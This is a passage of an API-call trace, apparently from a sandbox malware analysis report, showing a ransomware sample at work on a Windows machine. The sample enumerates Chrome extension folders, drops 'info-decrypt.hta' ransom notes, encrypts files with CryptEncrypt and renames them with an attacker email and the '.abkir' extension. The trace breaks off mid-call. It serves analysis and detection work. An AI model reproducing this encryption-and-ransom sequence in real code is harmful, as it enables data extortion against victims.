ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x38a58900, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0213.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e904) returned 1 [0213.718] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0213.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0213.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", lpFilePart=0x0) returned 0x89 [0213.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\", lpFilePart=0x0) returned 0x8a [0213.833] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f410 [0213.834] FindNextFileW (in: hFindFile=0xb7f410, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0213.834] FindNextFileW (in: hFindFile=0xb7f410, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0213.834] FindNextFileW (in: hFindFile=0xb7f410, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0213.834] FindClose (in: hFindFile=0xb7f410 | out: hFindFile=0xb7f410) returned 1 [0213.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0213.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0213.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0213.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", lpFilePart=0x0) returned 0x89 [0213.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\", lpFilePart=0x0) returned 0x8a [0213.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f410 [0213.835] FindNextFileW (in: hFindFile=0xb7f410, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0213.835] FindNextFileW (in: hFindFile=0xb7f410, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0213.835] FindNextFileW (in: hFindFile=0xb7f410, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0213.835] FindClose (in: hFindFile=0xb7f410 | out: hFindFile=0xb7f410) returned 1 [0213.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0213.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0213.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpFilePart=0x0) returned 0x97 [0213.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0213.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0213.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0213.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0213.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpFilePart=0x0) returned 0x97 [0213.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0213.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0213.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x598 [0213.836] GetFileType (hFile=0x598) returned 0x1 [0213.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0213.836] GetFileType (hFile=0x598) returned 0x1 [0213.837] WriteFile (in: hFile=0x598, lpBuffer=0x36f9cd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x36f9cd8*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0213.838] WriteFile (in: hFile=0x598, lpBuffer=0x36f9cd8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x36f9cd8*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0213.838] CloseHandle (hObject=0x598) returned 1 [0213.838] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpFilePart=0x0) returned 0x97 [0213.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0213.838] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x36facf4 | out: lpFileInformation=0x36facf4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea)) returned 1 [0213.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0213.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpFilePart=0x0) returned 0x97 [0213.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0213.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0213.839] GetFileType (hFile=0x598) returned 0x1 [0213.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0213.840] GetFileType (hFile=0x598) returned 0x1 [0213.840] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0xea [0213.840] ReadFile (in: hFile=0x598, lpBuffer=0x36fb144, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x36fb144*, lpNumberOfBytesRead=0x949e95c*=0xea, lpOverlapped=0x0) returned 1 [0213.841] CloseHandle (hObject=0x598) returned 1 [0213.841] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbe0690) returned 1 [0213.842] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x36fc808 | out: pbBuffer=0x36fc808) returned 1 [0214.349] CryptImportKey (in: hProv=0xbe0690, pbData=0x36850b8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e8cc | out: phKey=0x949e8cc*=0xb7f050) returned 1 [0214.349] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0214.349] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0214.350] CryptDuplicateKey (in: hKey=0xb7f050, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e8bc | out: phKey=0x949e8bc*=0xb7f4d0) returned 1 [0214.350] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0214.350] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x3685198*=0x1, dwFlags=0x0) returned 1 [0214.350] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x3685164, dwFlags=0x0) returned 1 [0214.350] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36851a8*, pdwDataLen=0x949e928*=0xf0, dwBufLen=0xf0 | out: pbData=0x36851a8*, pdwDataLen=0x949e928*=0xf0) returned 1 [0214.350] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36852bc*, pdwDataLen=0x949e930*=0x0, dwBufLen=0x10 | out: pbData=0x36852bc*, pdwDataLen=0x949e930*=0x10) returned 1 [0214.351] CryptDestroyKey (hKey=0xb7f050) returned 1 [0214.351] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0214.351] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0214.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpFilePart=0x0) returned 0x97 [0214.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e894) returned 1 [0214.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0214.352] GetFileType (hFile=0x208) returned 0x1 [0214.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e890) returned 1 [0214.352] GetFileType (hFile=0x208) returned 0x1 [0214.352] WriteFile (in: hFile=0x208, lpBuffer=0x3685984*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e924, lpOverlapped=0x0 | out: lpBuffer=0x3685984*, lpNumberOfBytesWritten=0x949e924*=0x20, lpOverlapped=0x0) returned 1 [0214.353] CloseHandle (hObject=0x208) returned 1 [0214.354] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0214.354] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0214.354] CoTaskMemFree (pv=0x66cdfc8) [0214.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0214.354] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8d0 | out: ppv=0x949e8d0*=0xb51e34) returned 0x0 [0214.354] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8c8 | out: pAptType=0x949e8c8*=1) returned 0x0 [0214.354] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8cc | out: ppvObject=0x949e8cc*=0x0) returned 0x80004002 [0214.354] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.355] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e238 | out: ppv=0x949e238*=0x60273e0) returned 0x0 [0214.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e450 | out: ppvObject=0x949e450*=0x0) returned 0x80004002 [0214.355] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e464 | out: ppvObject=0x949e464*=0x6030b70) returned 0x0 [0214.356] WbemDefPath:IUnknown:Release (This=0x60273e0) returned 0x0 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e084 | out: ppvObject=0x949e084*=0x6030b70) returned 0x0 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e040 | out: ppvObject=0x949e040*=0x0) returned 0x80004002 [0214.356] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d99c | out: ppvObject=0x949d99c*=0x0) returned 0x80004002 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d94c | out: ppvObject=0x949d94c*=0x0) returned 0x80004002 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d958 | out: ppvObject=0x949d958*=0xbdef90) returned 0x0 [0214.356] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdef90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d960 | out: pCid=0x949d960*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.356] WbemDefPath:IUnknown:Release (This=0xbdef90) returned 0x3 [0214.356] CoGetContextToken (in: pToken=0x949d9b8 | out: pToken=0x949d9b8) returned 0x0 [0214.356] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0214.356] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0214.356] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0214.356] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0214.356] CoGetContextToken (in: pToken=0x949e6a8 | out: pToken=0x949e6a8) returned 0x0 [0214.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x949e778*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e774 | out: 